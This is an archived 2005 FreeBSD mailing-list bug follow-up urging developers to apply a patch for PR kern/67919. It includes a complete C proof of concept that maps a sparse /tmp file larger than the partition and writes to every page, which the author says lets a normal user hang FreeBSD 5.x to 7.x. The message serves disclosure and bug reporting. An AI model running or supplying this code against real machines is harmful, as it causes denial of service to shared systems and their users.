Date:      Sun, 30 Oct 2005 21:28:22 -0800
From:      "Cai, Quanqing" <caiquanqing@gmail.com>
To:        freebsd-current@freebsd.org, bug-followup@FreeBSD.org
Cc:        Edwin Groothuis <edwin@mavetju.org>, Igor Sysoev <is@rambler-co.ru>, Uwe Doering <gemini@geminix.org>
Subject:   Re: kern/67919: Why nobody take serious to fix this bug?
Message-ID:  <2b22951e0510302128q571a3c1se111262e88ae19bb@mail.gmail.com>

Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html

After I read all the messages and related links, I feel so frustrated: why
does nobody take fixing this bug seriously, even though we have a patch for
it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user!
The system becomes unresponsive, so I have to power cycle it. The patch made
by Uwe Doering actually works well. This bug looks like a security hole to
me :( If you guys don't like this patch, please give a reason and come up
with a better patch or solution.

For the impatient, you can run this to crash your system (7.x, 6.x, 5.x); you
have to increase FILELEN to a size greater than your /tmp partition:

===============================================
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>

#define FILENAME "/tmp/test" /* where to put the test file */
#define FILELEN 710 /* test file length in MB */

int
main(void)
{
	int fd;
	size_t len;
	char *buf, *p, *lim;

	/* Compute the length in size_t so larger FILELEN values do not overflow int. */
	len = (size_t)FILELEN * 1024 * 1024;

	if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
		err(2, "open() failed");

	/* Extend the file to len bytes without writing data (sparse file). */
	if (ftruncate(fd, len) == -1)
		err(2, "ftruncate() failed");

	/* Map the whole file shared and writable. */
	buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED)
		err(2, "mmap() failed");
	(void)close(fd);

	/* Write one byte every 4096 bytes across the mapping. */
	for (p = buf, lim = p + len; p < lim; p += 4096)
		*p = '0';

	if (munmap(buf, len) == -1)
		err(2, "munmap() failed");

	exit(0);
}
===============================================


Cai, Quanqing


